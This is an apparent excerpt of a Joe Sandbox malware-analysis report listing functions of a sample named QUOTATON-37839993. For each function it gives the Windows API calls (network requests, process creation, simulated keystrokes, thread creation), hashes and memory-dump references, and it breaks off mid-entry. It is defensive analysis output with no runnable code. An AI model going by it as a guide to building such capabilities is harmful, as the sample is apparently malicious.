                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$_memset
                                                                      • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2862541840-218231672
                                                                      • Opcode ID: 620aa83f2ab2e8cf422d10fa3c243960f8d864e243981f36879f1e4959de6b60
                                                                      • Instruction ID: cccc6ec56759cdf3fceed6bd7e1b219079aa13a4cd6fd4ac0103593da91c84e8
                                                                      • Opcode Fuzzy Hash: 620aa83f2ab2e8cf422d10fa3c243960f8d864e243981f36879f1e4959de6b60
                                                                      • Instruction Fuzzy Hash: 7F91AD70A00219BBDF24DFA5D848FAEB7B8EF85714F109119F519BB292D7709904CBA0
                                                                      Function 00E5A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumChildWindows.USER32(?,00E5A439), ref: 00E5A377
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ChildEnumWindows
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 3555792229-1603158881
                                                                      • Opcode ID: 1b5bc7d76956bb8205184e511dc5ed403ce78244d6b776986d81bc790f1b85fd
                                                                      • Instruction ID: 783680ffb4ce7167a3bf8cf88d2b1bd555b8570b48a9c7a746b6f151e684002f
                                                                      • Opcode Fuzzy Hash: 1b5bc7d76956bb8205184e511dc5ed403ce78244d6b776986d81bc790f1b85fd
                                                                      • Instruction Fuzzy Hash: B791E770500605AACB08DFA0C482BEEFBB4BF44305F58A639EC99B7191DF31699DCB91
                                                                      Function 00E02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E02EAE
                                                                        • Part of subcall function 00E01DB3: GetClientRect.USER32(?,?), ref: 00E01DDC
                                                                        • Part of subcall function 00E01DB3: GetWindowRect.USER32(?,?), ref: 00E01E1D
                                                                        • Part of subcall function 00E01DB3: ScreenToClient.USER32(?,?), ref: 00E01E45
                                                                      • GetDC.USER32 ref: 00E3CD32
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E3CD45
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E3CD53
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E3CD68
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00E3CD70
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E3CDFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: cbc90700ea0e131f845e429059277ce6b28eefb93db601edf7b50a5b0e6a75a6
                                                                      • Instruction ID: 501ef4b73a50fa42152016035f9954cc85a071627295e09b9cf067e9ab5398a8
                                                                      • Opcode Fuzzy Hash: cbc90700ea0e131f845e429059277ce6b28eefb93db601edf7b50a5b0e6a75a6
                                                                      • Instruction Fuzzy Hash: B6718E31500205DFCF259F64C888AEA7FB5FF48318F24626AFD597A2A6D731D882DB50
                                                                      Function 00E71A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E71A50
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E71A7C
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E71ABE
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E71AD3
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71AE0
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E71B10
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00E71B57
                                                                        • Part of subcall function 00E72483: GetLastError.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E72498
                                                                        • Part of subcall function 00E72483: SetEvent.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E724AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 2603140658-3916222277
                                                                      • Opcode ID: 7c1f25bfff8ac1018f9e6f234db43efbe018bd579ef152aa76074a9d569561bb
                                                                      • Instruction ID: d0225402a176f8412f5a2e390e78047dfc83881e71e865a81f0af82dfcff8b5a
                                                                      • Opcode Fuzzy Hash: 7c1f25bfff8ac1018f9e6f234db43efbe018bd579ef152aa76074a9d569561bb
                                                                      • Instruction Fuzzy Hash: BC417FB1511318BFEB118F54CC89FFA7BACEF08354F00916AFA09BA141E7759E449BA0
                                                                      Function 00E78C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E8F910), ref: 00E78D28
                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E8F910), ref: 00E78D5C
                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E78ED6
                                                                      • SysFreeString.OLEAUT32(?), ref: 00E78F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                      • String ID:
                                                                      • API String ID: 560350794-0
                                                                      • Opcode ID: 18591369a9e9c98b9c25bcefea7b20bd781d54161a8b708422d4f24633733920
                                                                      • Instruction ID: fa03a5fd32608d09d996e38965d99d5625f8d417d444f3ef01652820f38710a3
                                                                      • Opcode Fuzzy Hash: 18591369a9e9c98b9c25bcefea7b20bd781d54161a8b708422d4f24633733920
                                                                      • Instruction Fuzzy Hash: 67F12571A00209AFCF14DF94C988EAEB7B9FF59314F109498F909BB251DB31AE45CB61
                                                                      Function 00E7F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E7F6B5
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F848
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F86C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F8AC
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F8CE
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7FA4A
                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E7FA7C
                                                                      • CloseHandle.KERNEL32(?), ref: 00E7FAAB
                                                                      • CloseHandle.KERNEL32(?), ref: 00E7FB22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                      • String ID:
                                                                      • API String ID: 4090791747-0
                                                                      • Opcode ID: 98b3f2c849adda3316938117d85ac1b6a1432d33c7d55435e6357b191b3f9f7a
                                                                      • Instruction ID: 3b6acb9b86a834702d06f6912f55a12ef2e231f4063a949fe3b6cd6173379db4
                                                                      • Opcode Fuzzy Hash: 98b3f2c849adda3316938117d85ac1b6a1432d33c7d55435e6357b191b3f9f7a
                                                                      • Instruction Fuzzy Hash: 95E1AF716043009FCB14EF24D891B6ABBE1BF85354F14D96DF899AB2A2DB30DC85CB52
                                                                      Function 00E64CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63697,?), ref: 00E6468B
                                                                        • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63697,?), ref: 00E646A4
                                                                        • Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E64D40
                                                                      • _wcscmp.LIBCMT ref: 00E64D5A
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E64D75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 793581249-0
                                                                      • Opcode ID: e4c5ceceb3d854b9d96157f94ceeebcd1a7d0af85a6e758dd8a7c462dea82e61
                                                                      • Instruction ID: 5c042b3b578e5511e0bec7feca7b4e7952870a69965cfabad7412aff6fa1a600
                                                                      • Opcode Fuzzy Hash: e4c5ceceb3d854b9d96157f94ceeebcd1a7d0af85a6e758dd8a7c462dea82e61
                                                                      • Instruction Fuzzy Hash: 6A5166B25483459BC725EBA0E8819DF73ECAF85354F00192EF289E3191EF35A588C766
                                                                      Function 00E88645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E886FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: b089b370f18ac6477e7d6ad6f8aa9a25d8ec1d908955afcd73e399c8966e0519
                                                                      • Instruction ID: 7489cc57187955f9a2f919154e6445152e1294aaa37149578a427a261f52ef5a
                                                                      • Opcode Fuzzy Hash: b089b370f18ac6477e7d6ad6f8aa9a25d8ec1d908955afcd73e399c8966e0519
                                                                      • Instruction Fuzzy Hash: 7651A470500244BFEB24AB25CE89F997BA4AB05324FE02126FD5DF61E0DF72A980DB40
                                                                      Function 00E02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E3C2F7
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3C319
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E3C331
                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E3C34F
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E3C370
                                                                      • DestroyIcon.USER32(00000000), ref: 00E3C37F
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E3C39C
                                                                      • DestroyIcon.USER32(?), ref: 00E3C3AB
                                                                        • Part of subcall function 00E8A4AF: DeleteObject.GDI32(00000000), ref: 00E8A4E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                      • String ID:
                                                                      • API String ID: 2819616528-0
                                                                      • Opcode ID: fd015a9329a28d7c373dac0f12489039fd370a213c6227aa71531cdb756e48e8
                                                                      • Instruction ID: 903ef2d9e0df0bd2f365dfe6b6dcd6f2b0ebe73950f395a1596d8614d98968a4
                                                                      • Opcode Fuzzy Hash: fd015a9329a28d7c373dac0f12489039fd370a213c6227aa71531cdb756e48e8
                                                                      • Instruction Fuzzy Hash: 8A516971600205AFDB24DF65CC49FAA7BE5EB58314F205529FA06B72E0D771EC90DB50
                                                                      Function 00E5966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A84C
                                                                        • Part of subcall function 00E5A82C: GetCurrentThreadId.KERNEL32 ref: 00E5A853
                                                                        • Part of subcall function 00E5A82C: AttachThreadInput.USER32(00000000,?,00E59683,?,00000001), ref: 00E5A85A
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5968E
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E596AB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E596AE
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E596B7
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E596D5
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E596D8
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E596E1
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E596F8
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E596FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 5635755b1de73c8a897df2ac3abbb48eb556af2252eec3134f7b8bcb8e2d99f1
                                                                      • Instruction ID: c5f02bc006f01e968c92be300f1841f7584aafa9150be3eff1a5308871253dea
                                                                      • Opcode Fuzzy Hash: 5635755b1de73c8a897df2ac3abbb48eb556af2252eec3134f7b8bcb8e2d99f1
                                                                      • Instruction Fuzzy Hash: 2011CEB1A10218BEF6106B619C8DFAA3B6DEB4C751F101525F648BB0A1C9F25C149BA4
                                                                      Function 00E58921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E5853C,00000B00,?,?), ref: 00E5892A
                                                                      • HeapAlloc.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E58931
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E5853C,00000B00,?,?), ref: 00E58946
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E5853C,00000B00,?,?), ref: 00E5894E
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E58951
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E5853C,00000B00,?,?), ref: 00E58961
                                                                      • GetCurrentProcess.KERNEL32(00E5853C,00000000,?,00E5853C,00000B00,?,?), ref: 00E58969
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E5896C
                                                                      • CreateThread.KERNEL32(00000000,00000000,00E58992,00000000,00000000,00000000), ref: 00E58986
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: e99fd6595e7cfbd3f24dc8f362d73ccbfa21f52ce8e092e8a114ce4ff9ad136e
                                                                      • Instruction ID: 2b02a1f3436af1581194cfb5bf3869653c3249ed67fbc2b0e5387c9d9cc88673
                                                                      • Opcode Fuzzy Hash: e99fd6595e7cfbd3f24dc8f362d73ccbfa21f52ce8e092e8a114ce4ff9ad136e
                                                                      • Instruction Fuzzy Hash: 3801BF75641304FFE710ABA5DC8DF677B6CEB89711F404421FA09EB1A2CA74D814CB20
                                                                      Function 00E79B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 00452539a995aa0a90422d939bafd7269d2fca2b969840aa887b4ab18eeeac2d
                                                                      • Instruction ID: 86976f168d5641f4255c19dbd0db2144d9a34ea00867d5f4c30800e8a5027c22
                                                                      • Opcode Fuzzy Hash: 00452539a995aa0a90422d939bafd7269d2fca2b969840aa887b4ab18eeeac2d
                                                                      • Instruction Fuzzy Hash: 37C19371A0021A9FDF10DF98D884AEEB7F5FF48314F149469E909BB282E770AD45CB90
                                                                      Function 00E7975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?,?,00E57455), ref: 00E57127
                                                                        • Part of subcall function 00E5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57142
                                                                        • Part of subcall function 00E5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57150
                                                                        • Part of subcall function 00E5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?), ref: 00E57160
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E79806
                                                                      • _memset.LIBCMT ref: 00E79813
                                                                      • _memset.LIBCMT ref: 00E79956
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E79982
                                                                      • CoTaskMemFree.OLE32(?), ref: 00E7998D
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 00E799DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1300414916-2785691316
                                                                      • Opcode ID: cd0906fcad3534c2ee71c4b992849ec43b8adb3aa0c2ebb02e47cb85477b3cf7
                                                                      • Instruction ID: 246cd723b006f71872ba3e743423912e0aed1ff5d1016d04d20338adfb7b7e4f
                                                                      • Opcode Fuzzy Hash: cd0906fcad3534c2ee71c4b992849ec43b8adb3aa0c2ebb02e47cb85477b3cf7
                                                                      • Instruction Fuzzy Hash: 8B912871D00229EBDB10DFA5DC41EDEBBB9AF48310F10916AF519B7291EB719A44CFA0
                                                                      Function 00E86D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E86E24
                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E86E38
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E86E52
                                                                      • _wcscat.LIBCMT ref: 00E86EAD
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E86EC4
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E86EF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
